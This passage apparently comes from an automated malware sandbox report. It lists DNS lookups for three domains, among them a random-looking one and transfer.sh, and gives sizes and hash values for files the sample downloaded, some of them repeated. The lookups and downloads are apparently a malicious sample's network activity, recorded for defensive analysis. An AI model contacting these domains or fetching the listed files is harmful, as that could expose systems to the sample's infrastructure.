64 B 80 B 1 1
DNS Request
o36fafs3sn6xou.com
DNS Response
34.65.131.183
-
67 B 83 B 1 1
DNS Request
thehumancondition.com
DNS Response
50.87.226.149
-
57 B 73 B 1 1
DNS Request
transfer.sh
DNS Response
144.76.136.153
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD597666365f5a60c0019db21bea991eec0
SHA10d348c08d1a58f6e3bb6c62b60cb6e968cafbf78
SHA2560fd5cabf357b48d0cfa6c24dfc5ed92fffeae10f4cbb970ec63d806bd5c3f243
SHA512007524ebc2e430e75bc56111069c72ee3f32bb67fcd7ac36cf9cd0fcfe422f0ec76df6f2350a64cf3da4b194fd9ae40369705711faa52b27d385c536ba0d22cb
-
Filesize
724KB
MD53b8110f0239136b1aaf4f7ea0570f39f
SHA10f14fa9f3eee063dadb35cf9b6455b1e57aa490a
SHA256eca2994ad7459e2d456b4b13d64b38b1f9e5e6d8e9f317e212ab8b09de6ae46f
SHA51299ca7a18690a045aeab762413c6f81724ca05411af97226cba8d4d55d80dc5c87a2c2971e2231845fc35bb601f135468ace21da99eee3507cd51806e94daf98a
-
Filesize
724KB
MD53b8110f0239136b1aaf4f7ea0570f39f
SHA10f14fa9f3eee063dadb35cf9b6455b1e57aa490a
SHA256eca2994ad7459e2d456b4b13d64b38b1f9e5e6d8e9f317e212ab8b09de6ae46f
SHA51299ca7a18690a045aeab762413c6f81724ca05411af97226cba8d4d55d80dc5c87a2c2971e2231845fc35bb601f135468ace21da99eee3507cd51806e94daf98a
-
Filesize
724KB
MD56338fe6cfdce82783854fd3e5865a19a
SHA1c096d34a1393ceb386142f951ad0d12bd139f811
SHA2565efe7599d26de299d2b9050d52238c660af9eacadac4d424320c2099215ea67c
SHA5128b85c51a4f076682087e9c1a29fe4c5236b54b0c83da4684dc6fb4481416c4e2c6b1baea24ddb4b5931383b710d0318413edf7d27ecbb83145a3148817ed9402
-
Filesize
724KB
MD56338fe6cfdce82783854fd3e5865a19a
SHA1c096d34a1393ceb386142f951ad0d12bd139f811
SHA2565efe7599d26de299d2b9050d52238c660af9eacadac4d424320c2099215ea67c
SHA5128b85c51a4f076682087e9c1a29fe4c5236b54b0c83da4684dc6fb4481416c4e2c6b1baea24ddb4b5931383b710d0318413edf7d27ecbb83145a3148817ed9402
-
Filesize
2.6MB
MD5701b03f316f1906936a7882afb8e93c6
SHA1305c0d52f4e83661d604c01ee1a0171b2532b380
SHA256b4c758e51a6f76ed43e0219aac7367af7d7b54c12130a39fdad3caa1f402d675
SHA51208fcd469bc2ca2ca83d27ce17e7eb2852d5bfa3bd7a7e4183bb0789915f15f1ba056cd2b12d3aaf72035ffe0af0198ef5dea86d1dd9412cb3f9ec8e07890cef6
-
Filesize
288KB
MD54848f5f7e346c7e7292cab2c3fa56d8c
SHA1360cad306d3145f6074a49ece3aac41c46e8834e
SHA256a8fe3a11ba859359bac4d28c7374d24d8c8fe270739a311fa6eaa4d941ef5698
SHA512bb014659898ef849f771a4e406e449d60a9496483bbbe402169c7fca7f0637cca5bc320179d3c652906dfe23a475ebb2d9449825be4a7a095414b9487796788a
-
Filesize
288KB
MD54848f5f7e346c7e7292cab2c3fa56d8c
SHA1360cad306d3145f6074a49ece3aac41c46e8834e
SHA256a8fe3a11ba859359bac4d28c7374d24d8c8fe270739a311fa6eaa4d941ef5698
SHA512bb014659898ef849f771a4e406e449d60a9496483bbbe402169c7fca7f0637cca5bc320179d3c652906dfe23a475ebb2d9449825be4a7a095414b9487796788a
-
Filesize
288KB
MD54848f5f7e346c7e7292cab2c3fa56d8c
SHA1360cad306d3145f6074a49ece3aac41c46e8834e
SHA256a8fe3a11ba859359bac4d28c7374d24d8c8fe270739a311fa6eaa4d941ef5698
SHA512bb014659898ef849f771a4e406e449d60a9496483bbbe402169c7fca7f0637cca5bc320179d3c652906dfe23a475ebb2d9449825be4a7a095414b9487796788a
-
Filesize
288KB
MD54848f5f7e346c7e7292cab2c3fa56d8c
SHA1360cad306d3145f6074a49ece3aac41c46e8834e
SHA256a8fe3a11ba859359bac4d28c7374d24d8c8fe270739a311fa6eaa4d941ef5698
SHA512bb014659898ef849f771a4e406e449d60a9496483bbbe402169c7fca7f0637cca5bc320179d3c652906dfe23a475ebb2d9449825be4a7a095414b9487796788a
-
Filesize
288KB
MD54848f5f7e346c7e7292cab2c3fa56d8c
SHA1360cad306d3145f6074a49ece3aac41c46e8834e
SHA256a8fe3a11ba859359bac4d28c7374d24d8c8fe270739a311fa6eaa4d941ef5698
SHA512bb014659898ef849f771a4e406e449d60a9496483bbbe402169c7fca7f0637cca5bc320179d3c652906dfe23a475ebb2d9449825be4a7a095414b9487796788a
-
Filesize
288KB
MD54848f5f7e346c7e7292cab2c3fa56d8c
SHA1360cad306d3145f6074a49ece3aac41c46e8834e
SHA256a8fe3a11ba859359bac4d28c7374d24d8c8fe270739a311fa6eaa4d941ef5698
SHA512bb014659898ef849f771a4e406e449d60a9496483bbbe402169c7fca7f0637cca5bc320179d3c652906dfe23a475ebb2d9449825be4a7a095414b9487796788a
-
Filesize
126KB
MD5e92a6a3a013a87cf57f3753d77a1b9c9
SHA101366b392cb71fed71f5bc1cd09e0f8c76657519
SHA25642a247529de63a9b43768ac145e38fe9da3adc8b2eed558e3ce11e5cd8bbc0e5
SHA512c59bab1bef238927fe8102cca6080f7b62e945254668201d0eaa49a64c6969e1f8eef65b2fea56d341035f0995b5c24907487351e4cde2b6baa5d49f5a192b57
-
Filesize
126KB
MD5e92a6a3a013a87cf57f3753d77a1b9c9
SHA101366b392cb71fed71f5bc1cd09e0f8c76657519
SHA25642a247529de63a9b43768ac145e38fe9da3adc8b2eed558e3ce11e5cd8bbc0e5
SHA512c59bab1bef238927fe8102cca6080f7b62e945254668201d0eaa49a64c6969e1f8eef65b2fea56d341035f0995b5c24907487351e4cde2b6baa5d49f5a192b57
-
Filesize
126KB
MD5e92a6a3a013a87cf57f3753d77a1b9c9
SHA101366b392cb71fed71f5bc1cd09e0f8c76657519
SHA25642a247529de63a9b43768ac145e38fe9da3adc8b2eed558e3ce11e5cd8bbc0e5
SHA512c59bab1bef238927fe8102cca6080f7b62e945254668201d0eaa49a64c6969e1f8eef65b2fea56d341035f0995b5c24907487351e4cde2b6baa5d49f5a192b57